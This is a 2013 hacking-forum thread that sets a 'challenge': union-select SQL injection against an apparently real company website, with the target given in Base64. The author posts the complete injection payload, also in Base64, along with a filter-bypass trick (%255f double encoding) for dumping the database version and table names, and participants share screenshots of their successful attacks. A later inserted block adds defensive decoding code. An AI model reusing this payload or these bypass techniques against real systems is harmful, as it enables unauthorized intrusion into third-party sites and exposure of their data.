Renegade, posted August 7, 2013 (edited September 25, 2013 by Renegade)

Target:
aHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82Nzg=
(Base64)

Tasks:
- display version with your name
- display table names from primary database
- remove commas after table name (as in picture)

Proof:

Rules:
- use union select based SQLi
- post picture as proof
- send me your command to PM

Solvers:
- Hannibal.
- Todo
- ajkaro
- danyweb09

Solution:
this is my syntax
aHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82NzgnIGFuZCBmYWxzZSBVTklPTiBTRUxFQ1QgMSwyLDMsNCwweDUyNjU2ZTY1Njc2MTY0NjUsdmVyc2lvbigpLDcsOCxjb25jYXQocmVwbGFjZShncm91cCUyNTVmY29uY2F0KHRhYmxlJTI1NWZuYW1lLDB4M2M2MjcyM2UpLCcsJywnJykpLDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzIGZyb20gaW5mb3JtYXRpb24lMjU1ZnNjaGVtYS50YWJsZXMgd2hlcmUgdGFibGUlMjU1ZnNjaGVtYT1kYXRhYmFzZSgpLS0gLQ==
(Base64)

- for the injection I used '
- for commenting it out I used -- -
- to bypass _ I used %255f, that is: take _ and convert it to hex, so it becomes %5f, and then %5f in URL encoding
- to replace the comma after the tables I used "replace"

challenge closed

Hannibal., posted August 7, 2013

Something like this? Sorry for posting so late, I just woke up.
Thanks for the challenge.

ajkaro, posted August 8, 2013 (edited August 8, 2013 by ajkaro)

Nice challenge...:-)

dancezar (Active Members), posted August 8, 2013 (edited August 8, 2013 by danyweb09)

Thanks a lot for the challenge. At first I thought it was very easy, but it wasn't really :)) I actually learned something :)
I'll be back shortly with an edit to leave a screenshot.
// Done
http://s23.postimg.org/cue9sdxt7/rsz_screenshot_3.png

XoddX, posted August 8, 2013

I got as far as the tables... can anyone help me with them? I tried various "things" but didn't succeed. I want you to help me for my own general (lack of) knowledge, not for the CH. I'm waiting for a PM, please. Thank you.

Renegade (Author), posted August 8, 2013

> I got as far as the tables... can anyone help me with them? I tried various "things" but didn't succeed. I want you to help me for my own general (lack of) knowledge, not for the CH. I'm waiting for a PM, please. Thank you.

I'll post the solution at the end. Keep trying, don't give up. Good luck.
Feel free to use the academy's courses:
http://pentesting-academy.com/MySQLiacademy/lv1.php?id=1

XoddX, posted August 10, 2013

Can we have the solution? I managed to extract all of those but I can't get rid of those commas. So?

Hannibal., posted August 10, 2013

*** hint ***
Have you by any chance searched the net for a table with the hex value for newline?

Renegade (Author), posted August 10, 2013

I'll post the solution tonight. Until then, a hint: replace _ with %255f.
Where does %255f come from??? Take _ and convert it to hex, so it becomes %5f, and then %5f in URL encoding.
But besides that, you also have to remove the , when the tables are displayed in order to be added to the solvers.
Good luck.
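
Added example, not part of the original thread: the %255f hint seen from the defender's side, showing why a check made after a single percent-decode misses the underscore and how decoding to a fixed point exposes it. It assumes (the thread does not say so) that the target's filter saw the value after one decode and the application decoded it once more; the function names and sample values are constructed for illustration.

```python
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumed cap so hostile input cannot force unbounded decoding


def canonicalize(value):
    """Percent-decode until the value stops changing; return (result, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def naive_filter_blocks(raw, banned="_"):
    """Hypothetical filter: decodes once, as a web server would, then checks."""
    return banned in unquote(raw)


def inspect(raw, banned="_"):
    """Compare the single-decode filter with a check on the canonical form."""
    canonical, rounds = canonicalize(raw)
    return {
        "canonical": canonical,
        "multi_encoded": rounds > 1,  # more than one layer of %-encoding
        "naive_blocks": naive_filter_blocks(raw, banned),
        "canonical_blocks": banned in canonical,
    }


# Constructed sample parameter values (not taken from any real log).
SAMPLES = ["table_name", "table%5fname", "table%255fname", "100%25"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, inspect(sample))
```

A value that needs more than one decode round is worth logging on its own, since ordinary clients rarely send it; the durable fix for the injection itself is a parameterized query, which makes the character filter unnecessary.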

XoddX, posted August 10, 2013

That's what I did, but I still need to remove the " , " and CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS

Renegade (Author), posted August 10, 2013

That's not right. By 8 o'clock I'll try to post the solution with an explanation. I'm on my phone right now.